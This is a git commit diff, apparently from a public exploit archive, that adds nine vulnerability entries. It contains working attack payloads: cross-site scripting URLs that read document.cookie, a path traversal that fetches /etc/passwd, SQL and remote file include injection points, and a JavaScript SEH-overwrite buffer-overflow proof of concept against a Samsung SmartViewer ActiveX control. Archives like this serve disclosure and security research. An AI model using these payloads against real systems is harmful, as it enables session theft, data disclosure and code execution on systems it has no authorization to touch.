Update: 2015-01-21

9 new exploits
2015-01-21 08:35:27 +00:00 · 2015-01-21 08:35:27 +00:00 · 66b6bb6da3
commit 66b6bb6da3
parent 77291f0ca3
10 changed files with 127 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -32274,3 +32274,12 @@ id,file,description,date,author,platform,type,port
 35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 'expand' Parameter Cross Site Scripting Vulnerability",2011-06-01,"Stefan Schurtz",multiple,remote,0
 35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 'range' Parameter SQL Injection Vulnerability",2011-06-02,"Gjoko Krstic",php,webapps,0
 35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x KSM Local Denial of Service Vulnerability",2011-06-02,"Andrea Righi",linux,dos,0
+35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0
+35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 'sortorder' Parameter Cross Site Scripting Vulnerability",2011-06-06,Mr.ThieF,php,webapps,0
+35826,platforms/php/webapps/35826.txt,"Joomla CCBoard SQL Injection and Arbitrary File Upload Vulnerabilities",2011-06-06,KedAns-Dz,php,webapps,0
+35829,platforms/php/webapps/35829.txt,"Nakid CMS 1.0.2 'CKEditorFuncNum' Parameter Cross Site Scripting Vulnerability",2011-06-06,"AutoSec Tools",php,webapps,0
+35830,platforms/php/webapps/35830.txt,"Multiple WordPress WooThemes 'test.php' Cross Site Scripting Vulnerability",2011-06-06,MustLive,php,webapps,0
+35831,platforms/php/webapps/35831.txt,"PopScript 'index.php' Multiple Input Validation Vulnerabilities",2011-06-06,NassRawI,php,webapps,0
+35832,platforms/php/webapps/35832.txt,"Squiz Matrix 4 'colour_picker.php' Cross Site Scripting Vulnerability",2011-06-06,"Patrick Webster",php,webapps,0
+35833,platforms/php/webapps/35833.txt,"Xataface 1.x 'action' Parameter Local File Include Vulnerability",2011-06-07,ITSecTeam,php,webapps,0
+35834,platforms/php/webapps/35834.txt,"BLOG:CMS 4.2 Multiple Cross Site Scripting Vulnerabilities",2011-06-07,"Stefan Schurtz",php,webapps,0
--- a/platforms/php/webapps/35824.txt
+++ b/platforms/php/webapps/35824.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/48106/info
+
+vBulletin vBExperience is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+vBulletin vBExperience 3.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[path]/xperience.php?sortfield=xr&sortorder="><script>alert(1);</script> 
--- a/platforms/php/webapps/35826.txt
+++ b/platforms/php/webapps/35826.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/48108/info
+
+http://www.noticeboardpro.com/notice-board-pro-copyright.htmlJoomla CCBoard is prone to an SQL-injection vulnerability and an arbitrary-file-upload vulnerability because it fails to sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_ccboard&view=postlist&forum=1&topic=2 
--- a/platforms/php/webapps/35829.txt
+++ b/platforms/php/webapps/35829.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/48109/info
+
+Nakid CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Nakid CMS 1.0.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/cms/assets/addons/kcfinder/browse.php?CKEditorFuncNum=0);alert(0);// 
--- a/platforms/php/webapps/35830.txt
+++ b/platforms/php/webapps/35830.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/48110/info
+
+Multiple WordPress WooThemes (Live Wire) are prone to a cross-site scripting vulnerability because they fail to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/wp-content/themes/_theme's_name_/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E 
--- a/platforms/php/webapps/35831.txt
+++ b/platforms/php/webapps/35831.txt
@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/48113/info
+
+PopScript is prone to a remote file-include vulnerability, an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control. 
+
+http://www.example.com/PopScript/index.php?act=inbox&mode=1 [ SQL injection ]
+http://www.example.com/index.php?mode=[Shell txt]?&password=nassrawi&remember=ON 
--- a/platforms/php/webapps/35832.txt
+++ b/platforms/php/webapps/35832.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/48118/info
+
+Squiz Matrix is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Squiz Matrix 4.0.6 and 4.2.2 are vulnerable; other versions may also be affected. 
+
+http://www.example.com/__lib/html_form/colour_picker.php?colour=';%20alert(document.cookie);%20var%20x='&pickerid=000000 
--- a/platforms/php/webapps/35833.txt
+++ b/platforms/php/webapps/35833.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/48126/info
+
+Xataface is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+NOTE (July 4, 2011): The vendor indicates that this issue affects versions prior to Xataface 1.2.6, while the reporter indicates 1.3rc1 and 1.3rc2 are affected. 
+
+http://www.example.com/index.php?-action=../../../../../../etc/passwd%00 
--- a/platforms/php/webapps/35834.txt
+++ b/platforms/php/webapps/35834.txt
@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/48132/info
+
+BLOG:CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+BLOG:CMS 4.2.1.f is vulnerable; other versions may also be affected. 
+
+http://www.example.com/blogcms/photo/index.php?"<script>alert(0x0029A)</script>
+http://www.example.com/blogcms/photo/index.php?"<script>alert(&#039;XSS&#039;);</script>
+
+http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="<script>alert(&#039;XSS&#039;);</script>
+http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="<script>alert(0x0029A)</script>
+
+http://www.example.com/blogcms/admin/plugins/mailtoafriend/mailfriend.php
--- a/platforms/windows/remote/35822.html
+++ b/platforms/windows/remote/35822.html
@ -0,0 +1,45 @@
+<html>
+<!--
+Samsung SmartViewer BackupToAvi Remote Code Execution PoC 
+PoC developed by Praveen Darshanam 
+
+For more details refer
+http://darshanams.blogspot.com
+http://blog.disects.com/2015/01/samsung-smartviewer-backuptoavi-remote.html
+Original Vulnerability Discovered by rgod
+Vulnerable: Samsung SmartViewer 3.0
+Tested on Windows 7 Ultimate N SP1
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265
+-->
+
+<object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' ></object>
+<script >
+ var payload_length = 15000;
+ var arg1=1;
+ var arg2=1;
+ var arg3=1;
+ //blank strings
+ var junk = "";
+ var buf1 = "";
+ var buf2 = "";
+
+ //offset to SE is 156, initial analysis using metasploit cyclic pattern
+ for (i=0; i<156; i++)
+ {
+  buf1 += "A";
+ }
+ var nseh = "DD";
+ var seh = "\x87\x10";	//from Vulnerable DLL
+ junk = buf1 + nseh + seh;
+
+ //remaining buffer
+ for (j=0; j<(payload_length-junk.length); j++)
+ {
+  buf2 += "B";
+ }
+ //final malicious buffer
+ var fbuff = junk + buf2;
+ target.BackupToAvi(arg1 ,arg2 ,arg3 ,fbuff);
+
+</script>
+</html>